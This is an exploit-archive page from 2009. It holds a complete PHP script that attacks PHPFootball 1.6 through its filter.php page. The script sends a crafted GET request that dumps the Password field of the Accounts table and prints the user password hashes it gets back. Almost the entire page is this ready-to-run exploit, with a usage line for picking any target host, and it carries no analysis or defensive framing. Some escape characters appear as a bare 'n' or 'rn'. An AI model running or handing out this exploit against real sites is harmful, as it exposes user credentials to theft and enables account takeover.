[Exploit] [Remote] [Local] [Web Apps] [Dos/Poc] [Shellcode] [RSS]
# Title : PHPFootball <= 1.6 (filter.php) Remote Hash Disclosure Exploit
# Published : 2009-01-01
# Author : KinG-LioN
# Previous Title : ASPThai.Net Webboard 6.0 (bview.asp) SQL Injection Vulnerability
# Next Title : Memberkit 1.0 Remote PHP File Upload Vulnerability
<?php
// http://garr.dl.sourceforge.net/sourceforge/phpfootball/PHPfootball1.6.zip
$host = $argv[1];
$path = $argv[2];
if ($argc != 3) {
echo "PHPFootball <= 1.6 (filter.php) Remote Hash Disclosure Exploitn";
echo "by KinG-LioN - http://eurohackers.itn";
echo "Usage: php {$argv[0]} <host> <path>n";
exit;
}
else {
$head .= "GET /{$path}/filter.php?dbtable=Accounts&dbfield=Password HTTP/1.1rn";
$head .= "Host: {$host}rn";
$head .= "Connection: closernrn";
$fsock = fsockopen ($host,80);
fputs ($fsock,$head);
while (!feof($fsock)) {
$cont .= fgets($fsock);
}
fclose($fsock);
if (preg_match_all("/<td class=td>(.+?)</td>/",$cont,$i)) {
print_r($i[1]);
}
else {
die ("exploit errorn");
}
}
?>
# www.Syue.com [2009-01-01]